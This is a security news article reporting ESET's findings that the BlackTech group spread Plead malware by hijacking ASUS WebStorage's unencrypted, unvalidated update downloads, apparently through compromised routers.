Posted on
May 17, at
9:59 AM

Security firm ESET has released findings that have
been using ASUS’ WebStorage cloud service to deliver a particular malware known
as Plead to unsuspecting victims. The researchers working for ESET say that the
hacking group known as BlackTech Group has been using a combination of various
security weaknesses in ASUS’ platform to manage this hack.

Attacks combine various hacks to infect computers

The BlackTech Group, which has been identified by Trend Micro as a group that specifically targets both governmental and private organizations across Asia, is using a complicated series of steps that ESET has not been able to fully understand as of yet. The group came into the limelight last year when it used stolen code-signing certificates from D-Link to authenticate itself cryptographically as trustworthy. Prior to that incident though, they used spear-phishing and compromised routers which served as their CNC server for the malware they distributed.

Initially, the security company researchers thought that the malware was part of yet another supply-chain attack owing to ASUS having suffered a similar attack not too long ago. However, the supply-chain attack theory was quickly disproved, showing that ASUS was able to close that particular loophole in their company.

However, this latest hack is a testament to how bad ASUS’ security team really is, as the hackers were able to hijack data sent from their cloud service due to it being unencrypted. Many in the security industry think that with the history of breaches that ASUS have had, they would make sure that all their services were as secure as possible.

The malware arrived on the victim’s computers as a file
called AsusWSPanel.exe, which were being run as normal on users computers and
where even digitally signed by ASUS WebStorage. This is what lead the
researchers to suspect another supply-chain attack but for three notable
occurrences.

First is that the service delivered clean binaries, in addition, to Plead executables, while there was zero evidence for the ASUS server being used as control servers for malicious code. This combined with the hackers using standalone files as opposed to packaging the malware within legitimate ASUS software showed the researchers that there was something else at play.

MitM due to unencrypted connections

While looking at the most likely scenarios that the
attackers could be used to infect victims, they began to notice that the ASUS
WebStorage software was extremely vulnerable to man-in-the-middle attacks due
to the updates being requested over an unencrypted HTTP connection. Further to
that, it was noted that the ASUS software did not validate the authenticity of
the code it was downloading at all.

This then leads the researchers to the conclusion that BlackTech was managing to intercept the update process of ASUS WebStorage and pushing Plead to the target computer instead of the expected update. One more interesting tidbit that the researchers uncovered was that the routers being used by the organizations were for all intents and purposes the same. ESET declined to mention which company was responsible for these routers as they are still investigating this aspect of the hack. The researchers think that a portion of the attack might have been carried out by using fake DNS settings within the routers themselves, or possibly even something as complex as having tempered with the iptables.

It was the discovery of the link between the routers that
led the ESET researchers to 100% dismiss the idea of a supply-chain attack and
focus on the current working theory of a MitM attack. Currently, the company
has traced the attack to 20 computers that have received the Plead malware.
That is only the number of infected among the clients of ESET, and the
researchers believe the number is possibly much higher.

This is the second time ASUS has been caught out in as many
months, with the computer makers reputation taking more and more hits.

Summary

ASUS Embarrassed Again As Hackers Use Their Cloud Service To Infect Machines  - wAAACwAAAAAAQABAEACAkQBADs  - ASUS Embarrassed Again As Hackers Use Their Cloud Service To Infect Machines

Article Name

ASUS Embarrassed Again As Hackers Use Their Cloud Service To Infect Machines

Description

The researchers working for ESET say that the hacking group known as BlackTech Group has been using a combination of various security weaknesses in ASUS’ platform to manage this hack.

Author


Ali Raza

Publisher Name


Koddos

Publisher Logo



Source link

No tags for this post.

LEAVE A REPLY

Please enter your comment!
Please enter your name here